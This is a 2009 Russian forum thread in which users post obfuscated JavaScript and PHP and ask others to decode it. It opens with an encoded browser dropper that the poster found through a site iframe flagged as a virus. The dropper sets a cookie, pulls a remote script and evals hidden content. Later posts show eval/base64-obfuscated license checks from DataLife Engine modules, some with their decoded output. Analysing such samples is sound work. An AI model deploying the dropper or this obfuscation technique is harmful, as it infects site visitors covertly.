da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8";
ca="function dcs(ds,es){ds=unesc";
if (document.cookie.indexOf('rf5f6ds')==-1)
{
function callback(x)
{
window.tw = x;
sc('rf5f6ds',2,7);
eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');
document.write($a);
}
document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/weekly.json?callback=callback&exclude=hashtags'>" + "</scr" + "ipt>");
}
else
{
$a=''
};
function sc(cnm,v,ed)
{
var exd=new Date();
exd.setDate(exd.getDate()+ed);
document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
};

seofilms

11.11.2009, 19:10

Первая часть расшифровки есть, кто дальше? =) до перовй части я и сам дошел))) а дальше застрял... (((

seofilms

11.11.2009, 19:13

Помогите расшифровать javascript плиз...
http://slil.ru/28185653
Заранее спасибо. нашел это на сайте tfile.ru там был iframe на какуюто страничку браузер определил как вирус, я зашел на сайт iframe и нашел этот код... вот и интересно что это))

lol100

16.11.2009, 06:22

помогите базу64 снять

http://webfile.ru/4087736

Wakko

17.11.2009, 14:54

<?php
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =1924;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/NMxw02uHR6n7EjZsCVVuLfrNKfz+zK9TNx+e+/HdoNsB0lUzM6jWxetFFG21kGpjmsL72rwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPjTF8q')));return;?>
fsmsTAYCbcyTjhKvBH7pqqtEhuvRleE2/XGyfF4c2SxamPRXG0Yy0ojJV+XleConKfdlJbeBY53UrQAbMg9 ZjOwSkcsYKe2VvheEwgv2o40B7oGlKFF4D2NZL1ePtddZNBRmq +YEisy9NSY3iyahVlVEdXOdULOV3Fyh12mpQ9CTu6xmFbdB2dB yHNqzYmX/To93R5iVzfS4fvWD+eTJUsxbQrdBuVyAdvL+swUjzDpflI4A1S YLO/tpRRxwd19hbAmYvuf4O/bv85A1oJmsu1T0JIlBX1/NJhqWBtdXaOqRJvezoLg9tbhlhUGqdztFjAMafSniiHZyJGsJA vqTvpQ5wsg+zfNDUg50ZxNfVSgr0/+Dqb7PSV8D5RMDXK50p52PSNRkCguHjnLNlMuasw2scih3Omv8 f/s6fwbdH0UemtnveA0f1QTZhgaxVrXt8kPEZ/n9Qm8IsrWsXft8dNqSyf9aaTqKdEquEhVguPkbb1IAozhgYBPS RG6Tg0DhS5Vrwkm7IudWp06SF1JjteZDpob4JuFdmGN4GPfJzQ DHNne0uegZ1YwbIvJ2kRQU9RHkV00meNsKHk7cJPh3PmfANGbK DSw0f3T1CykKqEkfQn/Y4jrHnxG7bgkDlMO4MLQiqeXvfbIABD5Kcvpofd6flaE/E3Kiw9+KTkxSF5Z9ay==fsm43uY5b17LD38cjxfouZec7hzZfm Fy3UJCxv31wNXIhNxB0X5R0pf4XQzz/6gVMv3HWj1dQU2JRHyXEI3bE/XQ0oZ1hzbBnCL5xskSFMgqFDsMiQRbTHPAeTQ6PbNfkw7V6xx7 xUQKuaLWcBPEtUmLU07gR8ExZVXscdRLy4GHLR39bPhpN37hey A4nsJoL/VN/qAYyzp1zn9p2zxTzxxANUmTqx2D4Ghs2c3zKoc5Ckk+dXB8dBI eg45WyhDFBDS0nid9U6K4C3eEdLQPod6tRsAtuOgUY6oinS7d7 hZ1CCL6/GqVTkU8fz9sPLCT1wG3HW9hHeoavLHdOaT5Xcm/mAVPwji2P3/SwTjlYhgF2rKwyxD9sgGpN2FnbJVNqPQv0ytSpNsoSu7o8CrDn t5nNAa/88fKmuU2qWb74YA1TwXwp06N0vgepqSCL5ghOz2pHOM31BaDOz mSeAWnW3tzTyTnsB95mezI+9yRK5F5AU+M3467GtTSh1KZajWw pFL9WPlPnVcttMGaJyr2LPOogaLl+7gP9L+cXgU/TNSARX+VH1UxlmkhbXPE2WwrBOWR/xX/22VcXxAkhltTRW/7h+V1cyl3XHPzc0yehHNe7QT3a4URHyNoWfNMZIqoF1fcCR8Ii ggVCY5EerZjeyDIDlvasrKHsbN5V2AzzRRFT/BErxfBw+vWQtK4pe3A2VKDKzGTQ04nHb4kelIPTdOAY611lz4o QZKz5MZ7pW4R00FggOytF1807E0QER794Pf6CSlgxo5WATbzKC ggrrkRwO0plLBXUMGmUSXrJmbcvuZ1U9zP5A6tAXBd2A9YB8RT Ygs2cyLvxzSv24SG09VzRub+juaOGQux8dxZPSyk/7PxOf1swpU5FpyeOxzdXjMAJLz8Sf0f2B/Qd5O31/493rfOmtGExca0TEfNP0pan2XGNpJ+NGQutvZaG7kgq1Txo5BA QG17D6an7BzgISwvpF8QdYXbt36YX3/lVsUcOxsL3g93JPw6aiGjc7GeCrYWQB2vQtvQGtgqryVvXcSWk 7K1HWV7/8DZrh9cF5gqUt2YTmcak+H2G+69VKkiLUibqu92Y1fy4BCW+ik WpmfmBREIuDAISJO1xUJhHZbcvQZp4wHJ3ex4UA0RgTq1UJ9Qt gzaAzEdSfhdlUzndVoPyFQJJyzPtE2rOhKaDlKRMhKEySKSUVA HIzUis16m4crRMuixO/I8d5lgUGIlK2ngpnYsKM1P79byXY47QpkfAcYGDCBbevq6uFBa Tpps7ku7zgnphOWyiQznLKUOmeBn5/U6A1NAQa7Dk7f2mt5W4XOOmTcEE4g+ogpj6dZcPkpiiUqdvPJM 0J9oxpQ2GVp10/0m0maFTUxIh22cKG9NGNxKF9G4WDGv16R9t8Fk+A0q9nQEXWJz RQq/Z2BxthTT/uzXikmiIKLEfi6n61pCavkCpD20eoNWCsN0QXyLHNEvEozyzXW KtpoTPc0zKMMPCcwrGbF1WprqIGlSdUvlUyaZ6xZ7tELAk3otP I2c/XVacbk/hQWe45ShDWtgysYoFeZIrbXDHH800llV0Pp607gtLTb5/uxhtZc1o5l/9YehJFeLVwbx2kufa95i2xVXCtyzrzBxuXCht1h2FKJRo+ECsf AY+8Unbz+nsEn7HCvFgSfUaqfj90sSMJI4/XWEOa276IX5ebkydOkicUIbBlG16Xt2jtJKuFIg8JxkVPYPANh z7QwBGmDq8xlhZ26el18mphdovaowzxrvwrbZMunkbdK+uUVTk rFYsiDchNCJYoCD8qVgv8j35PblV5gqj2Y7eM8SAGk2x7ZkBHi E690oEl7Qy1uI2MJq4+BpGy5Xti87iGe8E9subPQT/X90+D0vqeHDpskSSfMS5+nzHsyieaSaGTWBtDxjIwWWUy==

Помогите раскодировать пожалуйста.

Kaimi

17.11.2009, 15:05

<?php
/*
================================================== ===
MOD "Files v.3.3" for DataLife Engine - by Snake
url = http://mynokia.su/
email - igramnet@gmail.com
Форум поддержки модуля http://savgroup.ru/
================================================== ===
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
-----------------------------------------------------
Copyright (c) 2004,2009 SoftNews Media Group
================================================== ===
Данный код защищен авторскими правами
================================================== ===
Файл: files_options.php
-----------------------------------------------------
Назначение: Вывод архива файлов
================================================== ===
*/
if (! defined ( 'DATALIFEENGINE' ))
die ( "Hacking attempt!" );

if ($is_logged) {
$tpl->load_template ( '' . $modulname . '/options.tpl' );

$metatags ['title'] = "Настройки пользователя";
$tpl->set ( '{title}', $metatags ['title'] );

$save_options = $_REQUEST ['save_options'];
if ($save_options) {
$allow_options = user_options ();

$allow_options [0] = $allow_options [0];
$allow_options [1] = intval ( $_REQUEST ['show_files_on_front'] );
$allow_options [2] = intval ( $_REQUEST ['show_button_email'] );
$allow_options [3] = intval ( $_REQUEST ['show_file_screenshot'] );
$allow_options [4] = intval ( $_REQUEST ['show_files_alpha'] );
$allow_options [5] = intval ( $_REQUEST ['show_files_comments'] );
$allow_options [6] = intval ( $_REQUEST ['show_files_related'] );
$allow_options [7] = intval ( $_REQUEST ['show_files_tags'] );
$allow_options [8] = intval ( $_REQUEST ['show_files_rating'] );
$allow_options [9] = trim ( stripslashes ( $_REQUEST ['show_files_view'] ) );
$allow_options [9] = htmlspecialchars ( $allow_options [9], ENT_QUOTES );

$options = implode ( "|", $allow_options );
$db->query ( "UPDATE `" . USERPREFIX . "_users` SET `" . $modulname . "_options` = '{$options}' WHERE `name` = '{$member_id["name"]}'" );
@unlink( ENGINE_DIR . '/cache/system/usergroup.php' );

}

$allow_options = user_options ();

$show_files_on_front = $allow_options [1];
$show_button_email = $allow_options [2];
$show_file_screenshot = $allow_options [3];
$show_files_alpha = $allow_options [4];
$show_files_comments = $allow_options [5];
$show_files_related = $allow_options [6];
$show_files_tags = $allow_options [7];
$show_files_rating = $allow_options [8];
$show_files_view = $allow_options [9];

// Проверка на вывод
// Вывод на главной
if ($show_files_on_front == 1) {
$tpl->set ( '{show_files_on_front1}', "checked" );
$tpl->set ( '{show_files_on_front0}', "" );
} elseif ($show_files_on_front == 0) {
$tpl->set ( '{show_files_on_front1}', "" );
$tpl->set ( '{show_files_on_front0}', "checked" );
} else {
$tpl->set ( '{show_files_on_front1}', "" );
$tpl->set ( '{show_files_on_front0}', "" );
}
// Вывод email
if ($show_button_email == 1) {
$tpl->set ( '{show_button_email1}', "checked" );
$tpl->set ( '{show_button_email0}', "" );
} elseif ($show_button_email == 0) {
$tpl->set ( '{show_button_email1}', "" );
$tpl->set ( '{show_button_email0}', "checked" );
} else {
$tpl->set ( '{show_button_email1}', "" );
$tpl->set ( '{show_button_email0}', "" );
}
// Вывод скриншота
if ($show_file_screenshot == 1) {
$tpl->set ( '{show_file_screenshot1}', "checked" );
$tpl->set ( '{show_file_screenshot0}', "" );
} elseif ($show_file_screenshot == 0) {
$tpl->set ( '{show_file_screenshot1}', "" );
$tpl->set ( '{show_file_screenshot0}', "checked" );
} else {
$tpl->set ( '{show_file_screenshot1}', "" );
$tpl->set ( '{show_file_screenshot0}', "" );
}
// Вывод алфавита
if ($show_files_alpha == 1) {
$tpl->set ( '{show_files_alpha1}', "checked" );
$tpl->set ( '{show_files_alpha0}', "" );
} elseif ($show_files_alpha == 0) {
$tpl->set ( '{show_files_alpha1}', "" );
$tpl->set ( '{show_files_alpha0}', "checked" );
} else {
$tpl->set ( '{show_files_alpha1}', "" );
$tpl->set ( '{show_files_alpha0}', "" );
}
// Вывод комментариев
if ($show_files_comments == 1) {
$tpl->set ( '{show_files_comments1}', "checked" );
$tpl->set ( '{show_files_comments0}', "" );
} elseif ($show_files_comments == 0) {
$tpl->set ( '{show_files_comments1}', "" );
$tpl->set ( '{show_files_comments0}', "checked" );
} else {
$tpl->set ( '{show_files_comments1}', "" );
$tpl->set ( '{show_files_comments0}', "" );
}
// Вывод похожих новостей
if ($show_files_related == 1) {
$tpl->set ( '{show_files_related1}', "checked" );
$tpl->set ( '{show_files_related0}', "" );
} elseif ($show_files_related == 0) {
$tpl->set ( '{show_files_related1}', "" );
$tpl->set ( '{show_files_related0}', "checked" );
} else {
$tpl->set ( '{show_files_related1}', "" );
$tpl->set ( '{show_files_related0}', "" );
}
// Вывод тегов
if ($show_files_tags == 1) {
$tpl->set ( '{show_files_tags1}', "checked" );
$tpl->set ( '{show_files_tags0}', "" );
} elseif ($show_files_tags == 0) {
$tpl->set ( '{show_files_tags1}', "" );
$tpl->set ( '{show_files_tags0}', "checked" );
} else {
$tpl->set ( '{show_files_tags1}', "" );
$tpl->set ( '{show_files_tags0}', "" );
}
// Вывод рейтинга
if ($show_files_rating == 1) {
$tpl->set ( '{show_files_rating1}', "checked" );
$tpl->set ( '{show_files_rating0}', "" );
} elseif ($show_files_rating == 0) {
$tpl->set ( '{show_files_rating1}', "" );
$tpl->set ( '{show_files_rating0}', "checked" );
} else {
$tpl->set ( '{show_files_rating1}', "" );
$tpl->set ( '{show_files_rating0}', "" );
}
// Вид архива
if ($show_files_view == "")
$tpl->set ( '{show_files_view}', $filesConfig ['view'] );
else
$tpl->set ( '{show_files_view}', $show_files_view );

$tpl->compile ( 'content' );
$tpl->clear ();
} else
msgbox ( "Ошибка", "Вы не авторизированы.<br /><a href=\"javascript:history.go(-1)\">Вернуться назад</a>." );
?>

Wakko

18.11.2009, 01:35

<?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) { function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B 9B9F958D906208506E) { $TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E); $T7FC56270E7A70FA81A5935B72EACBE29 = 0; $T9D5ED678FE57BCCA610140957AFAB571 = 0; $T0D61F8370CAD1D412F80B84D143E1257 = 0; $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3; $T800618943025315F869E4E1F09471012 = 0; $TDFCF28D0734569A6A693BC8194DE62BF = 16; $TC1D9F50F86825A1A2302EC2449C17196 = ""; $TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E); $TFF44570ACA8241914870AFBC310CDB85 = __FILE__; $TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB 85); $TA5F3C6A11B03839D46AF9FB43C97C188 = 0; preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188); for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA<$TDD7536794B63BF90ECCFD37F9B147D7F;) { if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit; if ($TDFCF28D0734569A6A693BC8194DE62BF == 0) { $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]); $TDFCF28D0734569A6A693BC8194DE62BF = 16; } if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 & 0x8000) { $T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4); $T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4); if ($T7FC56270E7A70FA81A5935B72EACBE29) { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) & 0x0F) + 3; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++) $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1 D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012-$T7FC56270E7A70FA81A5935B72EACBE29+$T0D61F8370CAD1 D412F80B84D143E1257]; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } else { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1 D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA++; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } } else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]; $TF623E75AF30E62BBD73D6DF5B50BB7B5 <<= 1; $TDFCF28D0734569A6A693BC8194DE62BF--; if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F) { $TFF44570ACA8241914870AFBC310CDB85 = implode("", $TC1D9F50F86825A1A2302EC2449C17196); $TFF44570ACA8241914870AFBC310CDB85 = "?".">".$TFF44570ACA8241914870AFBC310CDB85."<"."?"; return $TFF44570ACA8241914870AFBC310CDB85; } } } } eval(T7FC56270E7A70FA81A5935B72EACBE29("QAIAPD9waHAgABBpZighZGVmaW4AAGVkKCdEQVRBTElGRUVOR0 kAgE5FJykpICB7AkAgZGllKCJIAABhY2tpbmcgYXR0ZW1wdCEi BAApOyAgfQHxICR0ZXh0dmVycwAkaW9uX2xpbmsgPQFPIC4BQF 9hMABjdANwA2EkZm9ydW1fY29udGUgQG50AyBhcnJheSgBsSd7 Qk9BUgAwRCBIRUFERVJ9JwFBAEA9PiAkCEBkbGVfA5NiYXIsAV AgJ3tsYXMBPHRfdmlzaXQCtiAgAtECkwH3AwRubwMAd190aW1l AugDAmxhbmdkYXRlIIAgKAnHZmlnWycC0XN0YW1wJ10AQSwgJF 9USU1FKQTEU1RBVFMEmsABCUAHwXRwbC0+cmVzdWx0WycLZ5gC BHB0cwRxAnAnW3NlYXJjaC0TMV3AAQ5lC6EiPGEgaHJlZj1cIn skAlOCcBWCfVwiPiIHo1svAYMD2wegIjwvYYH8AlZnZXRuZXcC SwYeAlMGHwGDA9sGHXN1Af1ic2NyaXB0H7ACpgJSDCkCWAZ/BD8nCjP/0AyIJhgSnxKVAlgGbwHYBCYKggZmKSmUaWYgKIAAMUdGT1JVTV 9TVUJfRE9NQUlYSk4xYiAxciJkYWpheCvwIjwQkyAkcXUQgWFn ZRvQamF2YQFjXCIgdHlwAUGoPAiRLwGZPiCwIHZhciAq8wTyAT EpQCAnAKYvZW5naW5lLwHCLwHBLycKggMXdwL4eXNpd3lnAzE9 MOAJZDWAK8IB5CddfZNBA4M8LwkTPiIEcgNhJCrCbG9hZF89sV ABbDAwKAFBX2Rpci4nbWFpbi4CIEgbJxIFICAB0S0+Y29weQMW EBF7B7QKYWgCfRDlD2InD1wnIHNyYz0neyQKZWgADnR0cF9ob2 1lX3VybArAD280Ni4K4WpzJz4MZy4I32UNoUmjCrRzZXQoRVQ4/30nPDAM8DnfbSddDjUFQwNiAvEX0kqlAkYQARD8cmlnS7FmYWx zB2IU8CPyEKQN9QK0aHTiCAYwAjAj42lzX0bhX2hhc2gT8G1kN UAOKAEBKCdkJykuJzIuMxcpAaECpSQA/WZjYWNoZS0+OhAC4BrwAaIC+AhBJAYL9IxZIARGXYBdpCAYIHB 5DGR0cnUMUxPEICBwAGUNcAsALvMgcmVxdWlyZV9vbmMgQGUgY kNfRElSLicp5WRtaW4vaQTlbml0LmNXUHMuZkAnUwRBICAJYmR cFsAPApEkYGhlY2tfa2V5KCkJcgbECZ8EQ//wAGMQJhoyDYYawQ9pGrQM8gBSA+EIYhkUdCBhbjBxZCAa3AjAX 25hbWUawwkEEokkZl8+QQX7WydyZWcCpC4ETwGkKMFycggUB/EhBOYPMfwHIOMpMglxNTkogwFqLiI8ZGl2IBYSRiABwZCAG/BodEYQc3R5bEYhZGlzcGxheQFgOmJsb2NrO2MwPFjGNoE6Ly93 dyAIdy4YkC1maWxlcy5ydQPQdGl0ggYD0kRMRSBGAXEgR3JvdX AD4AEib8MAesBlkSB2LiIO3X+laWQnXS4iICaETQlBOyAiLhmB KCdZLOAiIAg/CDBwCgAQAGV0eAgbz/Du4/Dg7Oz7IOTrAAr/IPHs4PDy9O7t7uIIoFADBFJL8nUIsTwvEJA+COAHARBAhZIWZB OVbXAMsCh6gCc4gIZRMiMBxGx3wCgiIT8+")); ?>

Что то очень непонятное для меня, но весьма нужное. Помогите.

Kaimi

18.11.2009, 01:56

<?php
if (!defined('DATALIFEENGINE'))
{
die("Hacking attempt!");
}
$textversion_link = $textversion_link . $t_act;
$forum_content = array('{BOARD HEADER}' => $dle_forum_bar, '{last_visit}' => $forum_last_visit, '{now_time}' => langdate($forum_config['timestamp'], $_TIME), '{STATS}' => $tpl->result['dle_forum_stats'], '[search-link]' => "<a href=\"{$search_link}\">", '[/search-link]' => "</a>", '[getnew-link]' => "<a href=\"{$getnew_link}\">", '[/getnew-link]' => "</a>", '[subscription-link]' => "<a href=\"{$subscription_link}\">", '[/subscription-link]' => "</a>", '' => "<a href=\"{$textversion_link}\">", '' => "</a>", );
if (!defined('FORUM_SUB_DOMAIN'))
{
$forum_ajax = "<script language=\"javascript\" type=\"text/javascript\"> var forum_ajax = '/engine/forum/ajax/'; var forum_wysiwyg = '{$forum_config['wysiwyg']}'; </script>";
$tpl->load_template($tpl_dir.'main.tpl');
$tpl->copy_template = "{$forum_ajax}<script type='text/javascript' src='{$config['http_home_url']}engine/forum/ajax/dle_forum.js'></script>".$tpl->copy_template;
}
$tpl->set('{BOARD}', $tpl->result['dle_forum']);
$tpl->set('', $forum_content);
$copyrigt = false;
if (!$forum_config['copyright'])
{
$is_date_hash = md5(date('d').'2.3');
$date_hash = $fcache->get('date_hash');
if ($is_date_hash == $date_hash)
{
$copyrigt = true;
}
else
{
require_once ENGINE_DIR.'/forum/admin/init.class.php';
if ($dle_forum_init->check_key())
{
$copyrigt = true;
$fcache->set('date_hash', $is_date_hash);
}
}
if ($copyrigt and $forum_config['key_name'])
{
$copyrigt = $f_lang['reg_name'].$forum_config['key_name'];
}
}
if (!$copyrigt)
{
$tpl->copy_template = $tpl->copy_template."<div class=\"copyright\" style=\"display:block;\"><a href=\"http://www.dle-files.ru\" title=\"DLE Files Group\">DLE Forum</a> v.".$forum_config['version_id']." © ".date('Y')." <a href=\"http://www.pocketx.ru\" title=\"Программы для смартфонов\">Pocketx.Ru</a></div>".$copyrigt;
}
$tpl->compile('content');
$tpl->clear();
?>

Wakko

18.11.2009, 03:14

<?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) { function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B 9B9F958D906208506E) { $TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E); $T7FC56270E7A70FA81A5935B72EACBE29 = 0; $T9D5ED678FE57BCCA610140957AFAB571 = 0; $T0D61F8370CAD1D412F80B84D143E1257 = 0; $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3; $T800618943025315F869E4E1F09471012 = 0; $TDFCF28D0734569A6A693BC8194DE62BF = 16; $TC1D9F50F86825A1A2302EC2449C17196 = ""; $TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E); $TFF44570ACA8241914870AFBC310CDB85 = __FILE__; $TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB 85); $TA5F3C6A11B03839D46AF9FB43C97C188 = 0; preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188); for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA<$TDD7536794B63BF90ECCFD37F9B147D7F;) { if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit; if ($TDFCF28D0734569A6A693BC8194DE62BF == 0) { $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]); $TDFCF28D0734569A6A693BC8194DE62BF = 16; } if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 & 0x8000) { $T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4); $T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4); if ($T7FC56270E7A70FA81A5935B72EACBE29) { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) & 0x0F) + 3; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++) $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1 D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012-$T7FC56270E7A70FA81A5935B72EACBE29+$T0D61F8370CAD1 D412F80B84D143E1257]; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } else { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1 D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA++; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } } else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]; $TF623E75AF30E62BBD73D6DF5B50BB7B5 <<= 1; $TDFCF28D0734569A6A693BC8194DE62BF--; if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F) { $TFF44570ACA8241914870AFBC310CDB85 = implode("", $TC1D9F50F86825A1A2302EC2449C17196); $TFF44570ACA8241914870AFBC310CDB85 = "?".">".$TFF44570ACA8241914870AFBC310CDB85."<"."?"; return $TFF44570ACA8241914870AFBC310CDB85; } } } } eval(T7FC56270E7A70FA81A5935B72EACBE29("QAIAPD9waHAgABBkZWZpbmUgKCAAACdETEVfRk9SVU0nLCB0cn UIAGUgKTsCACBjbGFzcyBkbGVfAARmb3J1bV9pbml0ICB7AbBw cgAAaXZhdGUgZnVuY3Rpb24gcwAAZW5kX2tleSAoJHF1ZXJ5LA ADICRvdGhlcnMgPSAnJykDMANxAhAgJGhvc3QBMXd3dy4FkC1m aWwDAmVzLnJ1JwcSAnAgJHBhdGgCMS8A3mV4dHJhcy9hBiAG0S 4LcAJ5BKECgCIIAFBPU1QDZEhUVFAvMS4xXHJcJBZuIgUiJHAC cS49ICJIAJA6CBMB/yAAACJDb250ZW50LXR5cGU6IGECKHBwbGljYQ2xL3gtCtAtECB tLXUAVHJsZW5jb2RlZAQxew40fQa9VXMEAGVyLUFnBPA6IE1ve mlsbGEgHgA0LjADQQK9B3UFgGd0aDogIi5zdMZEBlEUdCkuIgN vCtJuZRFwb246GlBvc34AZQJRAEEX0wZTFNIUoUBmc29ja29wZ SEGbigYAiwgODAaAGVycm5vAIMHQCwYACAzMB9jA4FpZiAoISR oKXsgJFAgchZAQBpxX2dldF9jEnNzKCJodADhdHA6Ly8iIC4VU wCBG7IuICI/AWLYYCCSBUB9BSEAQWVsc2UAgSCyIGZ3cmk/HXRlCTAIQBphAqAB0RaQKCRhB1AKQQfRJx9QCgghJGE7CNFiAY BmcmVhZANyODE5cIwyA2AKMB4QJGI7IAOCKCgkAnAncz8gDH8x 